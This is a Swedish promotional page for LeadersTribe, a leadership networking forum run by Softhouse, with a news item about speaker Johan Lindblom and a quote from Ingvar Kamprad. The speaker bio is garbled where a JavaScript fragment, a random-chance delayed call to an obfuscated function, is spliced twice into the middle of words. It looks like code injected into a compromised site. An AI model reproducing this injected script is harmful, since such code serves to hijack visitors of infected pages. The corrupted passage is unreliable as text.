Brinner du för ledarskap och vill dela dina erfarenheter med andra?

VARFÖR?

Bra ledare fokuserar på andras behov. De accepterar andras åsikter och attityd, ger de anställda nödvändigt stöd för att matcha affärsmässiga och personliga mål, involverar dem i beslut och skapar känsla av delaktighet i teamet. Detta leder till större engagemang, förtroende och starkare relationer med teamet och bland andra intressenter. Denna strategi bygger på kunskap och tillämpning av Lean och Agila metoder, och vi kallar det för bra ledarskap.

VAD?

LeadersTribe är ett öppet och kreativt forum som kopplar samman ledare, oavsett bransch, med det som de är intresserade av. Vårt mål är att utvidga och öka kretsen av goda ledare i Sverige.
Forumet uppmuntrar nätverkande av bra ledarskapspraxis ovasett bransch eller ålder.

HUR?

I LeadersTribe är vårt mål att dela kunskap, motivera och lära av varandra i syfte att utveckla god ledarskapspraxis i Sverige. Samlingar är baserade på principen om öppenhet och erfarenhetsdelning.

Senaste nytt

LeadersTribe #1 Talare Johan Lindblom

Johan Lindblom är VD på Softhouse Smålandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and och har tidigare lång erfarenhet från ledandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande positioner och en bakgrund som mjukvaruutvecklare. Johan kommer tidigare från en roll inom Ericsson där han ansvarade för flera stora projekt och var ledare för […]

LeadersTribe – created by Softhouse

Kommande Gatherings

Kompensera dina brister. Människor som tror att de kan och vet allt blir oftast katastrofer. Själv har jag ett hav av brister och försöker kompensera dessa genom val av skickliga medarbetare

– Ingvar Kamprad